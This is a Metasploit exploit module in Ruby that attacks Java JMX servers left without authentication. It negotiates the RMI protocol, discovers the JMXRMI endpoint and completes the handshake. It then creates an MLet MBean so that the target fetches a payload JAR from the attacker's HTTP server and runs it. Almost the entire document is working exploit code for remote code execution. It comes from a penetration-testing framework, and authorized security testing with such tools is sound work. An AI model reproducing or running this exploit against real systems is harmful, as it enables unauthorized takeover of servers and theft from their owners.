1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
39
40
41
42
43
44
45
46
47
48
49
50
51
52
53
54
55
56
57
58
59
60
61
62
63
64
65
66
67
68
69
70
71
72
73
74
75
76
77
78
79
80
81
82
83
84
85
86
87
88
89
90
91
92
93
94
95
96
97
98
99
100
101
102
103
104
105
106
107
108
109
110
111
112
113
114
115
116
117
118
119
120
121
122
123
124
125
126
127
128
129
130
131
132
133
134
135
136
137
138
139
140
141
142
143
144
145
146
147
148
149
150
151
152
153
154
155
156
157
158
159
160
161
162
163
164
165
166
167
168
169
170
171
172
173
174
175
176
177
178
179
180
181
182
183
184
185
186
187
188
189
190
191
192
193
194
195
196
197
198
199
200
201
202
203
204
205
206
207
208
209
210
211
212
213
214
215
216
217
218
219
220
221
222
223
224
225
226
227
228
229
230
231
232
233
234
235
236
237
238
239
240
241
242
243
244
245
246
247
248
249
250
251
252
253
254
255
256
257
258
259
260
261
262
263
264
265
266
267
268
269
270
271
272
273
274
275
276
277
278
279
280
281
282
283
284
285
286
287
288
289
290
291
292
293
294
295
296
297
298
299
300
301
302
303
304
305
306
307
308
309
310
311
312
313
314
315
316
317
318
319
320
321
322
323
324
325
326
327
328
329
330
331
332
333
334
335
336
337
338
339
340
341
342
343
344
345
346
347
348
349
350
351
352
353
354
355
356
357
358
359
360
361
362
363
364
365
366
367
368
369 | ##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Java::Jmx
include Msf::Exploit::Remote::HttpServer
include Msf::Java::Rmi::Client
def initialize(info = {})
super(update_info(info,
'Name' => 'Java JMX Server Insecure Configuration Java Code Execution',
'Description' => %q{
This module takes advantage a Java JMX interface insecure configuration, which would
allow loading classes from any remote (HTTP) URL. JMX interfaces with authentication
disabled (com.sun.management.jmxremote.authenticate=false) should be vulnerable, while
interfaces with authentication enabled will be vulnerable only if a weak configuration
is deployed (allowing to use javax.management.loading.MLet, having a security manager
allowing to load a ClassLoader MBean, etc.).
},
'Author' =>
[
'Braden Thomas', # Attack vector discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['URL', 'https://docs.oracle.com/javase/8/docs/technotes/guides/jmx/JMX_1_4_specification.pdf'],
['URL', 'http://www.accuvant.com/blog/exploiting-jmx-rmi']
],
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'Privileged' => false,
'Payload' => { 'BadChars' => '', 'DisableNops' => true },
'Stance' => Msf::Exploit::Stance::Aggressive,
'DefaultOptions' =>
{
'WfsDelay' => 10
},
'Targets' =>
[
[ 'Generic (Java Payload)', {} ]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'May 22 2013'
))
register_options([
Opt::RPORT(1617)
], self.class)
end
def on_request_uri(cli, request)
if request.uri =~ /mlet$/
jar = "#{rand_text_alpha(8 + rand(8))}.jar"
mlet = "<HTML><mlet code=\"metasploit.JMXPayload\" "
mlet << "archive=\"#{jar}\" "
mlet << "name=\"#{@mlet}:name=jmxpayload,id=1\" "
mlet << "codebase=\"#{get_uri}\"></mlet></HTML>"
send_response(cli, mlet,
{
'Content-Type' => 'application/octet-stream',
'Pragma' => 'no-cache'
})
print_status("Replied to request for mlet")
elsif request.uri =~ /\.jar$/i
p = regenerate_payload(cli)
jar = p.encoded_jar
paths = [
["metasploit", "JMXPayloadMBean.class"],
["metasploit", "JMXPayload.class"],
]
jar.add_files(paths, [ Msf::Config.data_directory, "java" ])
send_response(cli, jar.pack,
{
'Content-Type' => 'application/java-archive',
'Pragma' => 'no-cache'
})
print_status("Replied to request for payload JAR")
end
end
def check
connect
unless is_rmi?
return Exploit::CheckCode::Safe
end
mbean_server = discover_endpoint
disconnect
if mbean_server.nil?
return Exploit::CheckCode::Safe
end
connect(true, { 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
unless is_rmi?
return Exploit::CheckCode::Unknown
end
jmx_endpoint = handshake(mbean_server)
disconnect
if jmx_endpoint.nil?
return Exploit::CheckCode::Detected
end
Exploit::CheckCode::Appears
end
def exploit
@mlet = "MLet#{rand_text_alpha(8 + rand(4)).capitalize}"
connect
print_status("#{peer} - Sending RMI Header...")
unless is_rmi?
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol")
end
print_status("#{peer} - Discoverig the JMXRMI endpoint...")
mbean_server = discover_endpoint
disconnect
if mbean_server.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to discover the JMXRMI endpoint")
else
print_good("#{peer} - JMXRMI endpoint on #{mbean_server[:address]}:#{mbean_server[:port]}")
end
connect(true, { 'RPORT' => mbean_server[:address], 'RPORT' => mbean_server[:port] })
unless is_rmi?
fail_with(Failure::NoTarget, "#{peer} - Failed to negotiate RMI protocol with the MBean server")
end
print_status("#{peer} - Proceeding with handshake...")
jmx_endpoint = handshake(mbean_server)
if jmx_endpoint.nil?
fail_with(Failure::NoTarget, "#{peer} - Failed to handshake with the MBean server")
else
print_good("#{peer} - Handshake with JMX MBean server on #{jmx_endpoint[:address]}:#{jmx_endpoint[:port]}")
end
print_status("#{peer} - Loading payload...")
unless load_payload(jmx_endpoint)
fail_with(Failure::Unknown, "#{peer} - Failed to load the payload")
end
print_status("#{peer} - Executing payload...")
invoke_run_stream = invoke_stream(
obj_id: jmx_endpoint[:id].chop,
object: "#{@mlet}:name=jmxpayload,id=1",
method: 'run'
)
send_call(call_data: invoke_run_stream)
disconnect
end
def is_rmi?
send_header
ack = recv_protocol_ack
if ack.nil?
return false
end
true
end
def discover_endpoint
send_call(call_data: discovery_stream)
return_data = recv_return
if return_data.nil?
vprint_error("#{peer} - Discovery request didn't answer")
return nil
end
answer = extract_object(return_data, 1)
if answer.nil?
vprint_error("#{peer} - Unexpected JMXRMI discovery answer")
return nil
end
case answer
when 'javax.management.remote.rmi.RMIServerImpl_Stub'
mbean_server = extract_unicast_ref(StringIO.new(return_data.contents[2].contents))
else
vprint_error("#{peer} - JMXRMI discovery returned unexpected object #{answer}")
return nil
end
mbean_server
end
def handshake(mbean)
vprint_status("#{peer} - Sending handshake / authentication...")
send_call(call_data: handshake_stream(mbean[:id].chop))
return_data = recv_return
if return_data.nil?
vprint_error("#{peer} - Failed to send handshake")
return nil
end
answer = extract_object(return_data, 1)
if answer.nil?
vprint_error("#{peer} - Unexpected handshake answer")
return nil
end
case answer
when 'java.lang.SecurityException'
vprint_error("#{peer} - JMX end point requires authentication, but it failed")
return nil
when 'javax.management.remote.rmi.RMIConnectionImpl_Stub'
vprint_good("#{peer} - Handshake completed, proceeding...")
conn_stub = extract_unicast_ref(StringIO.new(return_data.contents[2].contents))
else
vprint_error("#{peer} - Handshake returned unexpected object #{answer}")
return nil
end
conn_stub
end
def load_payload(conn_stub)
vprint_status("#{peer} - Getting JMXPayload instance...")
get_payload_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: "#{@mlet}:name=jmxpayload,id=1")
send_call(call_data: get_payload_instance)
return_data = recv_return
if return_data.nil?
vprint_error("#{peer} - The request to getObjectInstance failed")
return false
end
answer = extract_object(return_data, 1)
if answer.nil?
vprint_error("#{peer} - Unexpected getObjectInstance answer")
return false
end
case answer
when 'javax.management.InstanceNotFoundException'
vprint_warning("#{peer} - JMXPayload instance not found, trying to load")
return load_payload_from_url(conn_stub)
when 'javax.management.ObjectInstance'
vprint_good("#{peer} - JMXPayload instance found, using it")
return true
else
vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}")
return false
end
end
def load_payload_from_url(conn_stub)
vprint_status("Starting service...")
start_service
vprint_status("#{peer} - Creating javax.management.loading.MLet MBean...")
create_mbean = create_mbean_stream(obj_id: conn_stub[:id].chop, name: 'javax.management.loading.MLet')
send_call(call_data: create_mbean)
return_data = recv_return
if return_data.nil?
vprint_error("#{peer} - The request to createMBean failed")
return false
end
answer = extract_object(return_data, 1)
if answer.nil?
vprint_error("#{peer} - Unexpected createMBean answer")
return false
end
case answer
when 'javax.management.InstanceAlreadyExistsException'
vprint_good("#{peer} - javax.management.loading.MLet already exists")
when 'javax.management.ObjectInstance'
vprint_good("#{peer} - javax.management.loading.MLet created")
when 'java.lang.SecurityException'
vprint_error("#{peer} - The provided user hasn't enough privileges")
return false
else
vprint_error("#{peer} - createMBean returned unexpected object #{answer}")
return false
end
vprint_status("#{peer} - Getting javax.management.loading.MLet instance...")
get_mlet_instance = get_object_instance_stream(obj_id: conn_stub[:id].chop , name: 'DefaultDomain:type=MLet')
send_call(call_data: get_mlet_instance)
return_data = recv_return
if return_data.nil?
vprint_error("#{peer} - The request to getObjectInstance failed")
return false
end
answer = extract_object(return_data, 1)
if answer.nil?
vprint_error("#{peer} - Unexpected getObjectInstance answer")
return false
end
case answer
when 'javax.management.InstanceAlreadyExistsException'
vprint_good("#{peer} - javax.management.loading.MLet already found")
when 'javax.management.ObjectInstance'
vprint_good("#{peer} - javax.management.loading.MLet instance created")
else
vprint_error("#{peer} - getObjectInstance returned unexpected object #{answer}")
return false
end
vprint_status("#{peer} - Loading MBean Payload with javax.management.loading.MLet#getMBeansFromURL...")
invoke_mlet_get_mbean_from_url = invoke_stream(
obj_id: conn_stub[:id].chop,
object: 'DefaultDomain:type=MLet',
method: 'getMBeansFromURL',
args: { 'java.lang.String' => "#{get_uri}/mlet" }
)
send_call(call_data: invoke_mlet_get_mbean_from_url)
return_data = recv_return
vprint_status("Stopping service...")
stop_service
if return_data.nil?
vprint_error("#{peer} - The call to getMBeansFromURL failed")
return false
end
answer = extract_object(return_data, 3)
if answer.nil?
vprint_error("#{peer} - Unexpected getMBeansFromURL answer")
return false
end
case answer
when 'javax.management.InstanceAlreadyExistsException'
vprint_good("#{peer} - The remote payload was already loaded... okey, using it!")
return true
when 'javax.management.ObjectInstance'
vprint_good("#{peer} - The remote payload has been loaded!")
return true
else
vprint_error("#{peer} - getMBeansFromURL returned unexpected object #{answer}")
return false
end
end
end
|